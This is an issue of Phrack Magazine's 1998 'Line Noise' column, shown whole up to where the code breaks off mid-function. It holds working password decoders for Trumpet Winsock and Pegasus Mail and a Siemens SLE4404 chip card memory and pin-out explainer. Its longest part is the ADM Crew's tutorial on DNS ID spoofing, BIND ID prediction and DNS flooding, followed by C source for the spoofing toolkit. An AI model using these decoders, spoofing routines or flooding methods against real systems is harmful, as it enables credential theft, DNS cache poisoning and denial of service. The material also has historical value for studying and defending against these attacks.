| ---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20 |
|
|
|
|
| -------------------------[ P H R A C K 5 2 L I N E N O I S E |
|
|
|
|
| --------[ Various |
|
|
| 0x1>------------------------------------------------------------------------- |
|
|
| Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I |
| felt obligated to share a small piece of code that I don't like to admit |
| that I created, far earlier than the esteemed Jeep's published work. As his |
| requires access to a Pascal compiler and does not seem to be coded with |
| portability in mind, the fact that my script requires Trumpet itself to run |
| does not seem too great a hindrance. The irony is that not only is the |
| "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it |
| for you. |
|
|
| <++> password.cmd |
| # Put in Trumpet Winsock directory, run under "Dialer/Other" |
| # Cannot currently use any file other than trumpwsk.ini, |
| # apparently due to implementation errors in the "load" function |
| display \n |
| display "Trumpet Password Thief 1.0, 8-18-95"\n |
| display \n |
| if [load $username] |
| display "username: " |
| display $username\n |
| else |
| display "ERR: cannot load username"\n |
| end |
| if [load $password] |
| display "password: " |
| display $password\n |
| else |
| display "ERR: cannot load password"\n |
| end |
| display \n |
| <--> |
| |
| - anonymous |
|
|
| 0x2>------------------------------------------------------------------------- |
|
|
| Another password decoder for ya... written long ago, I just never bothered to |
| release it... |
|
|
| <++> peg-dec.c |
| /* |
| * Pegasus Mail Password Decoder v1.0 by Belgorath |
| */ |
| #include <stdio.h> |
|
|
| /* Decoding/Encoding Tables */ |
| int dec1[1]= { 44 }; |
| int dec2[2]= { 16, 21 }; |
| int dec3[3]= { 10, 22, 28 }; |
| int dec4[4]= { 37, 28, 21, 7 }; |
| int dec5[5]= { 21, 22, 37, 28, 9 }; |
| int dec6[6]= { 22, 15, 28, 42, 17, 2 }; |
| int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; |
| int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 }; |
|
|
| int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 }; |
|
|
| int decode_char(int numch, int ch, int pos) |
| { |
| ch-=decz[numch-1][pos-1]; |
| if(ch<-127) ch+=256; |
| return ch; |
| } |
| void main(void) |
| { |
| int zz,x,nc; |
| char *tz; |
| int inps[20]; |
|
|
| nc=0; |
| tz=malloc(8192); |
| printf("Enter Pegasus Mail Password: "); |
| gets(tz); |
|
|
| /* Fun input parsing loop. Hope your malloc bzero's... */ |
| while( *tz ) { |
| for(x=0;x<strlen(tz)+2;x++) { |
| if( (tz[x]==' ') || (tz[x]==0) ) { |
| tz[x]=0; |
| inps[nc]=atoi(tz); |
| nc++; |
| tz+=x+1; |
| break; |
| } |
| } |
| } |
|
|
| /* Throw away anything past the end */ |
| for(x=0;x<nc;x++) if(inps[x]==-1) nc=x+1; |
|
|
| /* All pegasus passwords end in -1 */ |
| if(inps[nc-1]!=-1) { |
| printf("Invalid Pegasus Mail Password.\n"); |
| return; |
| } |
|
|
| /* But we throw it away anyway */ |
| nc--; |
|
|
| printf("Decoded Password: ["); |
| for(x=1;x<nc+1;x++) putchar(decode_char(nc,inps[x-1],x)); |
| printf("]\n"); |
| } |
| <--> |
|
|
| 0x3>------------------------------------------------------------------------- |
| |
| :----------------------------: |
| Siemens Chip Card Technology |
|
|
| . by Yggdrasil . |
| :----------------------------: |
|
|
|
|
|
|
| Chip cards differ from one another in memory size, type of memory (PROM or |
| EEPROM), security logic and micro-controller. This article will discuss the |
| Siemens SLE4404 chip card technology. |
|
|
| The SLE4404 is employed for electronic purse cards and bank transactions, |
| cellular telephony (pre-payed cards), user IDs for access control, etc. (some |
| examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed |
| through a simple TTL serial channel, providing a +5 Vcc power supply from an |
| external source. |
|
|
|
|
| Inside the chip |
| ~~~~~~~~~~~~~~~ |
| The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix |
| (each row is 16-bits) that is protected by security logic providing access |
| control. |
|
|
| This is the logic diagram: |
|
|
| +------------------------+ +------------------+ |
| | Address Counter | --> | Column Decoder | |
| +------------------------+ +------------------+ |
| ^ | | 16 |
| | v v |
| +-----------+ +---------+ +------------------+ |
| C3,C8,C2,C5 --> | Control & | | Row | | User mem 208 bit | |
| C1 (Vcc) --> | Security | | Decoder | --> | Sec unit 192 bit | |
| C7 (I/O) <--> | Logic | | | 26 | Special mem unit | |
| +-----------+ +---------+ +------------------+ |
| ^ ^ |
| | | |
| +----------------------------------+ |
|
|
| The SLE4404 memory is subdivided in three main memory blocks: one is read |
| only (a "PROM" containing the manufacturer code and/or a serial number and |
| an expiration date), the second is both readable and writeable (user memory) |
| and the last block cannot be written to unless the lock-out fuse has been |
| fused. |
|
|
| This is the memory map: |
|
|
| BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE |
| ----------------------------------------------------------------------------- |
| Manufacturer code 16 0-15 Yes No No |
| Application ROM 48 16-63 Yes No No |
| User code 16 64-79 [fuse] U.C. U.C. |
| Error counter 4 80-83 Yes Yes U.C. |
| EEPROM #1 12 84-95 Yes Yes U.C. |
| EEPROM #2 16 96-111 Yes U.C. U.C. |
| Frame memory block |
| - F.M. config 2 112-113 Yes Yes U.C./R.C. |
| - Frame memory 206 114-319 [cfg] [cfg] U.C./R.C. |
| Frame code 32 320-351 [fuse] [fuse] [cfg] |
| Frame counter 64 352-415 Yes Yes [cfg] |
| ----------------------------------------------------------------------------- |
|
|
| Meaning of abbreviations: |
|
|
| U.C. - User code required |
| (each time the code is entered the error counter is decreased) |
| R.C. - Frame code required |
| (each time the code is entered the frame counter is decreased) |
| [fuse] - Operation allowed ONLY IF lock-out fuse is not fused |
| [cfg] - Operation allowed according to frame memory configuration |
|
|
| Frame memory configuration table: |
|
|
| BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE |
| ----------------------------------------------------------------------------- |
| 0 0 Secret ROM Yes No |
| 0 1 R.O.M. Yes No |
| 1 0 Secret PROM U.C. U.C. |
| 1 1 P.R.O.M. U.C. U.C. |
| ----------------------------------------------------------------------------- |
|
|
| The first 16-bit block is for the Manufacturer Code. The following 48-bit |
| block is called Application ROM, containing another code (Manufacturer sub |
| code or info, serial number, sub-type of card, etc). |
|
|
| The User Code is the access code (PIN) used to read/write/erase memory. |
| This code can be modified provided that the fuse was not fused, while the |
| error counter value can be modified even if the fuse was fused... |
|
|
| Please note that access to memory is blocked after four incorrect access |
| trials (checked by the counter). The same is for the Frame Code and the |
| Frame [error] Counter (note that the number of incorrect accesses is limited |
| to three trials instead of four). |
|
|
| Finally, the Frame Memory is generally used for storing personal user |
| information or the credit limit (money that can be fetched in a bank |
| transaction, or the remaining "virtual" credit that a pre-payed cellular card |
| contains). |
|
|
|
|
| The Pin-out |
| ~~~~~~~~~~~ |
| This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): |
|
|
| +-------+-------------------+ |
| | C 1 | C 5 | Contact Pin Info |
| | | | |
| +-------+ +-------+ 1 6 Vcc +5V |
| | C 2 | | C 6 | 2 5 Reset |
| | | | | 3 4 Clock |
| +-------+ +-------+ 4 3 Test input - N.C. |
| | C 3 | | C 7 | 5 8 Ground |
| | | | | 6 7 N.C. |
| +-------+ +-------+ 7 1 Bi-directional I/O data line |
| | C 4 | | C 8 | 8 2 Control input (data change) |
| | | | | |
| +-------+-----------+-------+ |
|
|
| "I am for ever walking upon these shores, |
| betwixt the sand and the foam. |
| The high tide will erase my foot-prints, |
| and the wind will blow away the foam. |
| But the sea and the shore will remain |
| For ever." |
| -- Gibran K. Gibran |
|
|
| 0x4>------------------------------------------------------------------------- |
| ___ ______ _ _ |
| / \ | _ \ | \ / | |
| | / \ | | | \ | | \_/ | |
| | |___| | | |_ / | | \_/ | |
| ..oO THE | --- | | / | | | | CreW Oo.. |
| ''' ''' ''''''' '''' '''' |
| presents |
|
|
| DNS ID Hacking |
| |
|
|
| --[1]-- DNS ID Hacking Presentation |
|
|
| You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID |
| Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This |
| method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID |
| hack/spoof is very efficient and very strong as there is no generation of DNS |
| daemons that escapes from it (even WinNT!). |
|
|
| --[1.1]-- DNS Protocol mechanism explanation |
|
|
| In the first step, you must know how the DNS works. I will only explain the |
| most important facts of this protocol. In order to do that, we will follow |
| the way of a DNS request packet from A to Z! |
|
|
| Name resolution example: |
| The client (bla.bibi.com) sends a request of resolution of the domain |
| "www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for |
| DNS. Let's take a look at the following picture.. |
|
|
| /---------------------------------\ |
| | 111.1.2.123 = bla.bibi.com | |
| | 111.1.2.222 = dns.bibi.com | |
| | format: | |
| | IP_ADDR:PORT->IP_ADDR:PORT | |
| | ex: | |
| | 111.1.2.123:2999->111.1.2.222:53| |
| \---------------------------------/ |
| ... |
| gethosbyname("www.heike.com"); |
| ... |
|
|
| [bla.bibi.com] [dns.bibi.com] |
| 111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53 |
|
|
| Here we see our resolution name request from source port 1999 which is asking |
| to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has |
| received the resolution request from bla.bibi.com, dns.bibi.com will have to |
| resolve the name: |
|
|
| [dns.bibi.com] [ns.internic.net] |
| 111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53 |
|
|
| dns.bibi.com asks ns.internic.net who the root name server for the address |
| of www.heike.com is, and if it doesn't have it and sends the request to a name |
| server which has authority on '.com' domains (note: we send a request to the |
| Internic because it could have this request in its cache). |
|
|
| [ns.internic.net] [ns.bibi.com] |
| 198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53 |
|
|
| Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS |
| that has authority over the domain bibi.com), that the name server of for.com |
| has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will |
| ask to ns.for.com for the address of www.heike.com, but this one doesn't have |
| it and will forward the request to the DNS of heike.com which has authority |
| for heike.com. |
|
|
| [ns.bibi.com] [ns.for.com] |
| 111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53 |
|
|
| The answer from ns.for.com: |
|
|
| [ns.for.com] [ns.bibi.com] |
| 144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53 |
|
|
| Now that we know which IP address has authority on the domain "heike.com" |
| (we'll call it ns.heike.com), we ask it what's the IP of the machine |
| www.heike.com. |
|
|
| [ns.bibi.com] [ns.heike.com] |
| 111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53 |
|
|
| We now have our answer: |
|
|
| [ns.heike.com] [ns.bibi.com] |
| 31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 |
|
|
| Great we have the answer, we can forward it to our client bla.bibi.com. |
|
|
| [ns.bibi.com] [bla.bibi.com] |
| 111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999 |
|
|
| Now bla.bibi.com knows the IP of www.heike.com. |
|
|
| Now let's imagine that we'd like to have the name of a machine from its IP, in |
| order to do that, we proceed a bit differently as the IP will have to be |
| transformed. |
|
|
| Reverse name lookup resolution: |
| 100.20.40.3 will become 3.40.20.100.in-addr.arpa |
|
|
| This method is only for the IP resolution request (reverse DNS). |
|
|
| Let's look at a practical example of when we take the IP address of |
| www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation |
| into a comprehensible format by DNS). |
|
|
| ... |
| gethostbyaddr("31.33.7.44"); |
| ... |
|
|
| We send our request to ns.bibi.com: |
|
|
| [bla.bibi.com] [ns.bibi.com] |
| 111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53 |
|
|
| Which is forwarded to ns.internic.net: |
|
|
| [ns.bibi.com] [ns.internic.net] |
| 111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53 |
|
|
| ns.internic.net will send the IP of a name server which has authority on |
| '31.in-addr.arpa'. |
|
|
| [ns.internic.net] [ns.bibi.com] |
| 198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53 |
|
|
| Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4: |
|
|
| [ns.bibi.com] [ns.for.com] |
| 111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53 |
|
|
| And so on. The mechanism is nearly the same that was used for name resolution. |
|
|
| --[1.2]-- DNS packet header |
|
|
| Here is the format of a DNS message : |
| +---------------------------+---------------------------+ |
| | ID (the famous :) | flags | |
| +---------------------------+---------------------------+ |
| | numbers of questions | numbers of answer | |
| +---------------------------+---------------------------+ |
| | number of RR authority |number of supplementary RR | |
| +---------------------------+---------------------------+ |
| | | |
| \ \ |
| \ QUESTION \ |
| | | |
| +-------------------------------------------------------+ |
| | | |
| \ \ |
| \ ANSWER \ |
| | | |
| +-------------------------------------------------------+ |
| | | |
| \ \ |
| \ Stuff etc.. No matter \ |
| | | |
| +-------------------------------------------------------+ |
|
|
| --[1.3]-- Structure of DNS packets. |
|
|
| __ID__ |
|
|
| The ID permits us to identify each DNS packet, since exchanges between name |
| servers are from port 53 to port 53, and more it might be more than one |
| request at a time, so the ID is the only way to recognize the different DNS |
| requests. Well talk about it later.. |
|
|
| __flags__ |
|
|
| The flags area is divided into several parts : |
|
|
| 4 bits 3 bits (always 0) |
| | | |
| | | |
| [QR | opcode | AA| TC| RD| RA | zero | rcode ] |
| | |
| | |__|__|__| |______ 4 bits |
| | |_ 1 bit |
| | |
| 1 bit |
|
|
| QR = If the QR bit = 0, it means that the packet is a question, otherwise |
| it's an answer. |
|
|
| opcode = If the value is 0 for a normal request, 1 for a reserve request, and |
| 2 for a status request (we don't need to know all these modes). |
|
|
| AA = If it's equal to 1, it says that the name server has an authoritative |
| answer. |
|
|
| TC = No matter |
|
|
| RD = If this flag is to 1, it means "Recursion Request", for example when |
| bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the |
| DNS to assume this request. |
|
|
| RA = If it's set to 1, it means that recursion is available. This bit is |
| set to 1 in the answer of the name server if it supports recursion. |
|
|
| Zero = Here are three zeroes... |
|
|
| rcode = It contains the return error messages for DNS requests if 0, it means |
| "no error", 3 means "name error" |
|
|
| The 2 following flags don't have any importance for us. |
|
|
| DNS QUESTION: |
|
|
| Here is the format of a DNS question : |
|
|
| +-----------------------------------------------------------------------+ |
| | name of the question | |
| +-----------------------------------------------------------------------+ |
| | type of question | type of query | |
| +--------------------------------+--------------------------------------+ |
|
|
| The structure of the question is like this. |
|
|
| example: |
| www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
| for an IP address, the format remains the same. |
|
|
| 44.33.88.123.in-addr.arpa would be: |
| [2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0] |
| [note]: a compression format exists, but we won't cover it. |
|
|
|
|
| type of question: |
|
|
| Here are the values that we will use much of the time (there are many more, |
| but these are only ones relevant): |
|
|
| name value |
| A | 1 | IP Address (resolving a name to an IP) |
| PTR | 12 | Pointer (resolving an IP to a name) |
|
|
|
|
| type of query: |
|
|
| The values are the same as the type of question. |
|
|
| DNS ANSWER: |
|
|
| Here is the format of an answer (an RR) |
|
|
| +------------------------------------------------------------------------+ |
| | name of the domain | |
| +------------------------------------------------------------------------+ |
| | type | class | |
| +----------------------------------+-------------------------------------+ |
| | TTL (time to live) | |
| +------------------------------------------------------------------------+ |
| | resource data length | | |
| |----------------------------+ | |
| | resource data | |
| +------------------------------------------------------------------------- |
|
|
| name of the domain: |
|
|
| The name of the domain in reports to the following resource: The domain name |
| is stored in the same way that the part question for the resolution request of |
| www.heike.com, the flag "name of the domain" will contain |
| [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]. |
|
|
| type: |
|
|
| The type flag is the same than "type of query" in the question part of the |
| packet. |
|
|
| class: |
| The class flag is equal to 1 for Internet data. |
|
|
| time to live: |
| This flag explains in seconds the time-life of the information into the |
| name server cache. |
|
|
| resource data length: |
| The length of resource data, for example if resource data length is 4, it |
| means that the data in resources data are 4 bytes long. |
|
|
| resource data: |
| here we put the IP for example (at least in our case) |
|
|
| I will offer you a little example that explains this better: |
|
|
| Here is what's happening when ns.bibi.com asks ns.heike.com for |
| www.heike.com's address |
|
|
| ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;) |
|
|
| +---------------------------------+--------------------------------------+ |
| | ID = 1999 | QR = 0 opcode = 0 RD = 1 | |
| +---------------------------------+--------------------------------------+ |
| | numbers of questions = htons(1) | numbers of answers = 0 | |
| +---------------------------------+--------------------------------------+ |
| | number of RR authoritative = 0 | number of supplementary RR = 0 | |
| +---------------------------------+--------------------------------------+ |
| <the question part> |
| +------------------------------------------------------------------------+ |
| | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | |
| +------------------------------------------------------------------------+ |
| | type of question = htons(1) | type of query=htons(1) | |
| +---------------------------------+--------------------------------------+ |
|
|
| here is for the question. |
|
|
| now let's stare the answer of ns.heike.com |
|
|
| ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53 |
|
|
| +---------------------------------+---------------------------------------+ |
| | ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 | |
| +---------------------------------+---------------------------------------+ |
| | numbers of questions = htons(1) | numbers of answers = htons(1) | |
| +---------------------------------+---------------------------------------+ |
| | number of RR authoritative = 0 | number of supplementary RR = 0 | |
| +---------------------------------+---------------------------------------+ |
| +-------------------------------------------------------------------------+ |
| | name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | |
| +-------------------------------------------------------------------------+ |
| | type of question = htons(1) | type of query = htons(1) | |
| +-------------------------------------------------------------------------+ |
| +-------------------------------------------------------------------------+ |
| | name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] | |
| +-------------------------------------------------------------------------+ |
| | type = htons(1) | class = htons(1) | |
| +-------------------------------------------------------------------------+ |
| | time to live = 999999 | |
| +-------------------------------------------------------------------------+ |
| | resource data length = htons(4) | resource data=inet_addr("31.33.7.44") | |
| +-------------------------------------------------------------------------+ |
|
|
| Yah! That's all for now :)) |
| |
| Here is an analysis: |
| In the answer QR = 1 because it's an answer :) |
| AA = 1 because the name server has authority in its domain |
| RA = 1 because recursion is available |
|
|
| Good =) I hope you understood that cause you will need it for the following |
| events. |
|
|
| --[2.0]-- DNS ID hack/spoof |
|
|
| Now it's time to explain clearly what DNS ID hacking/spoofing is. |
| Like I explained before, the only way for the DNS daemon to recognize |
| the different questions/answers is the ID flag in the packet. Look at this |
| example: |
|
|
| ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53 |
|
|
| So you only have to spoof the ip of ns.heike.com and answer your false |
| information before ns.heike.com to ns.bibi.com! |
|
|
| ns.bibi.com <------- . . . . . . . . . . . ns.heike.com |
| | |
| |<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com |
|
|
| But in practice you have to guess the good ID :) If you are on a LAN, you |
| can sniff to get this ID and answer before the name server (it's easy on a |
| Local Network :) |
|
|
| If you want to do this remotely you don't have a lot a choices, you only |
| have 4 basics methods: |
|
|
| 1.) Randomly test all the possible values of the ID flag. You must answer |
| before the ns ! (ns.heike.com in this example). This method is obsolete |
| unless you want to know the ID .. or any other favorable condition to |
| its prediction. |
|
|
| 2.) Send some DNS requests (200 or 300) in order to increase the chances |
| of falling on the good ID. |
|
|
| 3.) Flood the DNS in order to avoid its work. The name server will crash |
| and show the following error! |
|
|
| >> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT |
| at this time named daemon is out of order :) |
|
|
| 4.) Or you can use the vulnerability in BIND discovered by SNI (Secure |
| Networks, Inc.) with ID prediction (we will discuss this in a bit). |
|
|
|
|
| ##################### Windows ID Vulnerability ########################### |
|
|
| I found a heavy vulnerability in Windows 95 (I haven't tested it on |
| WinNT), lets imagine my little friend that's on Windows 95. |
| Windows ID's are extremely easy to predict because it's "1" by default :))) |
| and "2" for the second question (if they are 2 questions at the same time). |
|
|
|
|
| ######################## BIND Vulnerability ############################## |
|
|
| There is a vulnerability in BIND (discovered by SNI as stated earlier). |
| In fact, DNS IS are easily predictable, you only have to sniff a DNS in |
| order to do what you want. Let me explain... |
|
|
| The DNS uses a random ID at the beginning but it only increase this ID for |
| next questions ... =))) |
|
|
| It's easy to exploit this vulnerability. |
| Here is the way: |
|
|
| 1. Be able to sniff easily the messages that comes to a random DNS (ex. |
| ns.dede.com for this sample). |
|
|
| 2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will |
| ask to ns.dede.com to resolve (random).dede.com |
|
|
| ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com |
|
|
| 3. Now you have the ID of the message from NS.victim.com, now you know what |
| ID area you'll have to use. (ID = 444 in this sample). |
|
|
| 4. You then make your resolution request. ex. www.microsoft.com to |
| NS.victim.com |
| |
| (you) ---> [?www.microsoft.com] ---> ns.victim.com |
|
|
| ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com |
| |
| 5. Flood the name server ns.victim.com with the ID (444) you already have and |
| then you increase this one. |
|
|
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com |
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com |
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com |
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com |
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com |
| ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com |
|
|
|
|
| (now you know that DNS IDs are predictable, and they only increase. You |
| flood ns.victim.com with spoofed answers with the ID 444+ ;) |
|
|
| *** ADMsnOOfID does this. |
|
|
|
|
| There is another way to exploit this vulnerability without a root on |
| any DNS |
|
|
| The mechanism is very simple. Here is the explanation |
|
|
| We send to ns.victim.com a resolution request for *.provnet.fr |
|
|
| (you) ----------[?(random).provnet.fr] -------> ns.victim.com |
|
|
| Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr. |
| There is nothing new here, but the interesting part begins here. |
|
|
| From this point you begin to flood ns.victim.com with spoofed answers |
| (with ns1.provnet.fr IP) with ids from 100 to 110... |
|
|
| (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com |
| (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com |
| (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com |
| (spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com |
| ..... |
|
|
| After that, we ask ns.victim.com if (random).provnet.fr has an IP. |
|
|
| If ns.victim.com give us an IP for (random).provnet.fr then we have |
| found the correct ID :) Otherwise we have to repeat this attack until we |
| find the ID. It's a bit long but it's effective. And nothing forbids you |
| to do this with friends ;) |
|
|
| This is how ADMnOg00d works ;) |
|
|
| ------------------------------- |
|
|
|
|
|
|
| ########################################################################## |
|
|
| Here you will find 5 programs |
| ADMkillDNS - very simple DNS spoofer |
| ADMsniffID - sniff a LAN and reply false DNS answers before the NS |
| ADMsnOOfID - a DNS ID spoofer (you'll need to be root on a NS) |
| ADMnOg00d - a DNS ID predictor (no need to be root on a NS) |
| ADNdnsfuckr - a very simple denial of service attack to disable DNS |
|
|
| Have fun!! :) |
| Note: You can find source and binaries of this progs at |
| ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would |
| be on janova. You need to install libpcap on your machine before any |
| compilation of the ADMID proggies :) |
|
|
|
|
| ADM Crew. |
|
|
| Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love |
| these guys) |
| Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at |
| www.secnet.com for finding the vulnerability =) |
|
|
| <++> ADMIDpack/ADM-spoof.c |
| /************************************************************************/ |
| /* ADM spoofing routine for spoof udp */ |
| /************************************************************************/ |
| |
| #define IPHDRSIZE sizeof(struct iphdr) |
| #define UDPHDRSIZE sizeof(struct udphdr) |
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <unistd.h> |
| #include <memory.h> |
|
|
| #include <sys/types.h> |
| #include <sys/socket.h> |
| #include <sys/wait.h> |
| #include <sys/ioctl.h> |
| #include <sys/stat.h> |
| #include <netdb.h> |
| #include <netinet/in.h> |
| #include "ip.h" |
| #include "udp.h" |
|
|
|
|
| /*****************************************************************************/ |
| /* |
| * in_cksum -- |
| * Checksum routine for Internet Protocol family headers (C Version) |
| */ |
| /*****************************************************************************/ |
|
|
| unsigned short in_cksum(addr, len) |
| u_short *addr; |
| int len; |
| { |
| register int nleft = len; |
| register u_short *w = addr; |
| register int sum = 0; |
| u_short answer = 0; |
| |
| /* |
| * Our algorithm is simple, using a 32 bit accumulator (sum), we add |
| * sequential 16 bit words to it, and at the end, fold back all the |
| * carry bits from the top 16 bits into the lower 16 bits. |
| */ |
| while (nleft > 1) { |
| sum += *w++; |
| nleft -= 2; |
| } |
| |
| /* mop up an odd byte, if necessary */ |
| if (nleft == 1) { |
| *(u_char *)(&answer) = *(u_char *)w ; |
| sum += answer; |
| } |
| |
| /* add back carry outs from top 16 bits to low 16 bits */ |
| sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ |
| sum += (sum >> 16); /* add carry */ |
| answer = ~sum; /* truncate to 16 bits */ |
| return(answer); |
|
|
| } |
|
|
|
|
|
|
| int udp_send(s,saddr,daddr,sport,dport,datagram,datasize) |
| |
| int s; |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned short sport; |
| unsigned short dport; |
| char * datagram; |
| unsigned datasize; |
| { |
|
|
| struct sockaddr_in sin; |
| struct iphdr *ip; |
| struct udphdr *udp; |
| unsigned char *data; |
| unsigned char packet[4024]; |
| int x; |
| |
| ip = (struct iphdr *)packet; |
| udp = (struct udphdr *)(packet+IPHDRSIZE); |
| data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE); |
| |
| memset(packet,0,sizeof(packet)); |
|
|
| udp->source = htons(sport); |
| udp->dest = htons(dport); |
| udp->len = htons(UDPHDRSIZE+datasize); |
| udp->check = 0; |
|
|
| memcpy(data,datagram,datasize); |
| |
| memset(packet,0,IPHDRSIZE); |
| |
| ip->saddr.s_addr = saddr; |
| ip->daddr.s_addr = daddr; |
| ip->version = 4; |
| ip->ihl = 5; |
| ip->ttl = 245; |
| ip->id = random()%5985; |
| ip->protocol = IPPROTO_UDP; |
| ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize); |
| ip->check = 0; |
| ip->check = in_cksum((char *)packet,IPHDRSIZE); |
| |
| |
|
|
| sin.sin_family=AF_INET; |
| sin.sin_addr.s_addr=daddr; |
| sin.sin_port=udp->dest; |
| |
| x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0, |
| (struct sockaddr*)&sin, sizeof(struct sockaddr)); |
|
|
|
|
| return(x); |
| } |
|
|
|
|
|
|
| /*****************************************************************************/ |
| /* RECV PAKET */ |
| /* get_pkt(socket, *buffer , size of the buffer); */ |
| /*****************************************************************************/ |
|
|
| int get_pkt(s,data,size) |
| int s; |
| unsigned char *data; |
| int size; |
| { |
| struct sockaddr_in sin; |
| int len,resu; |
| len= sizeof(sin); |
| resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len); |
| return resu; |
| } |
| <--> |
| <++> ADMIDpack/ADMDNS2.c |
| /*************************************************/ |
| /* DNS include for play with DNS packet (c) ADM */ |
| /*************************************************/ |
|
|
| #define ERROR -1 |
| #define DNSHDRSIZE 12 |
| #define TYPE_A 1 |
| #define TYPE_PTR 12 |
|
|
|
|
| int myrand() |
| { |
| int j; |
| j=1+(int) (150.0*rand()/(RAND_MAX+1.0)); |
| return(j); |
| } |
|
|
|
|
| unsigned long host2ip(char *serv) |
|
|
| { |
| struct sockaddr_in sinn; |
| struct hostent *hent; |
| |
| hent=gethostbyname(serv); |
| if(hent == NULL) return 0; |
| bzero((char *)&sinn, sizeof(sinn)); |
| bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length); |
| return sinn.sin_addr.s_addr; |
| } |
|
|
| |
|
|
| void nameformat(char *name,char *QS) |
| { |
| /* CRAP & LAme COde :) */ |
| char lol[3000]; |
| char tmp[2550]; |
| char tmp2[2550]; |
| int i,a=0; |
| bzero(lol,sizeof(lol)); |
| bzero(tmp,sizeof(tmp)); |
| bzero(tmp2,sizeof(tmp2)); |
|
|
|
|
|
|
| for(i=0;i<strlen(name);i++) |
| { |
| if( *(name+i) == '.' ){ |
| sprintf(tmp2,"%c%s",a,tmp); |
| strcat(lol,tmp2); |
| bzero(tmp,sizeof(tmp)); |
| bzero(tmp2,sizeof(tmp2)); |
| a=0; |
| } |
| else tmp[a++] = *(name+i); |
| } |
| |
| sprintf(tmp2,"%c%s",a,tmp); |
| strcat(lol,tmp2); |
| strcpy(QS,lol); |
| } |
|
|
|
|
|
|
| void nameformatIP(char *ip, char *resu) |
| { |
| char *arpa = "in-addr.arpa"; |
| char bla[255]; |
| char arf[255]; |
| char haha[255]; |
| char c; |
| char *A[4]; |
| int i,a=3,k=0; |
|
|
| bzero(bla,sizeof(bla)); |
| bzero(arf,sizeof(arf)); |
| bzero(haha,sizeof(haha)); |
|
|
